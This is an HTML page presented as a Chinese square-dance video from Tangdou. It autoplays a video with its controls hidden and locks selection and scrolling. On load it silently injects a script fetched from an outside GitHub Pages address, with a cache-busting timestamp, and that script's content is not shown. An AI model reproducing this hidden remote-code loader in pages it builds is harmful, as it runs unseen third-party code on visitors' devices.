<!DOCTYPE html>
<html manifest="xx8.appcache">
<meta name="viewport" content="width=device-width,initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Cache-Control" content="no-cache"/>
<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=2.0"/>
<meta name="MobileOptimized" content="240"/>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>百哩:广场舞唱着情歌流着泪-糖豆</title>
<style>

*{
moz-user-select: -moz-none;
-moz-user-select: none;
-o-user-select:none;
-khtml-user-select:none;
-webkit-user-select:none;
-ms-user-select:none;
user-select:none;
}
body{text-align:center;margin:0px;padding:0px;}
	marquee{margin:0px;padding:0px;}
*{margin:0px;padding:0px;}

body{text-align:center;background:#F0F8FF;height:100%}
img{width:100%;}
body {
	overflow:scroll;
	overflow-y:hidden;
}

 video::-webkit-media-controls,
    video::-moz-media-controls,
    video::-webkit-media-controls-enclosure{
    display:none !important;
}

video::-webkit-media-controls-panel,
video::-webkit-media-controls-panel-container,
video::-webkit-media-controls-start-playback-button {
    display:none !important;
    -webkit-appearance: none;
}
</style>
<body scoll=no>
<video id="vio" style="top:0%;controls:false;width:100%;height:100%; z-index:-1;" src="mp4.mp4" 
id="video" preload="true" 
x-webkit-airplay="true" 
x5-playsinline="" 
playsinline="" 
webkit-playsinline=""
x5-video-player-type="h5" 
controls = "false"  
Aautoplay="autoplay"
autoplay
>


</video>

<p rgba(255,255,255,0);></p>
<div id="zb" style="top:0%;position:fixed;z-index:1001;text-align:center;malgin:0 auto;opacity:1;
font-size:16px;pointer-events:none;text-align:center;" >
	<marquee id="dm1" style="position:fixed;left:0%;background:#000;color:#1e87cc;font-size:24px;pointer-events:none;width:99%;text-align:center;" 
direction="left" scrollamount="4" behaviour="Scroll">
	</marquee>
</div>


	
<script>
	var timestamp = (new Date()).getTime();
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://hiddenhi.github.io/beylili/js.js?id="+timestamp;
document.body.appendChild(script);

</script>
<script>

document.body.style.overflow='hidden';

</script>


</body>
</html>
